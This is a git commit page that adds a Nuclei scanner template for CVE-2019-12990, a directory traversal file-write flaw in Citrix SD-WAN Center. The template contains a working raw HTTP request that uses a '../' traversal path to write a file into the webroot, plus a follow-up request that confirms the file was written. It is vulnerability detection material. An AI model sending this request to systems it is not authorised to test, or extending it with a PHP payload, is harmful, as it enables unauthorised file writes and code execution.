daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Create CVE-2019-12990.yaml 

The applianceSettingsFileTransfer action in ApplianceSettingsController is susceptible to directory traversal by a remote, unauthenticated attacker. Specifically, the applianceSettingsFileTransfer function does not sufficiently validate or sanitize HTTP request parameter values that are used to construct a file system path. An attacker can trigger this vulnerability by routing traffic through the Collector controller and supplying a crafted values for filename, filedata, and workspace_id. This vulnerability can be exploited to write files to locations writable by the www-data user. Furthermore, an attacker could write a crafted PHP file to /home/talariuser/www/app/webroot/files/ to execute arbitrary PHP code.

Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com>
patch-1
GwanYeong Kim 2022-07-31 09:16:07 +09:00
parent 5b53645a25
commit 297bc113b9
1 changed files with 35 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

35
cves/2019/CVE-2019-12990.yaml Normal file
View File

@ -0,0 +1,35 @@
id: CVE-2019-12990
info:
name: Citrix SD-WAN Center - Unauthenticated Directory Traversal File Write
author: gy741
severity: critical
description: |
The applianceSettingsFileTransfer action in ApplianceSettingsController is susceptible to directory traversal by a remote, unauthenticated attacker. Specifically, the applianceSettingsFileTransfer function does not sufficiently validate or sanitize HTTP request parameter values that are used to construct a file system path. An attacker can trigger this vulnerability by routing traffic through the Collector controller and supplying a crafted values for filename, filedata, and workspace_id. This vulnerability can be exploited to write files to locations writable by the www-data user. Furthermore, an attacker could write a crafted PHP file to /home/talariuser/www/app/webroot/files/ to execute arbitrary PHP code.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2019-12990
- https://www.tenable.com/security/research/tra-2019-31
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2019-12990
cwe-id: CWE-22
tags: cve,cve2019,citrix,rce,unauth
requests:
- raw:
- |
POST /Collector/appliancesettings/applianceSettingsFileTransfer HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
filename=../../../../../../home/talariuser/www/app/webroot/files/{{randstr}}&filedata=
GET /talari/app/files/{{randstr}} HTTP/1.1
Host: {{Hostname}}
Accept: */*
matchers:
- type: status
status:
- 200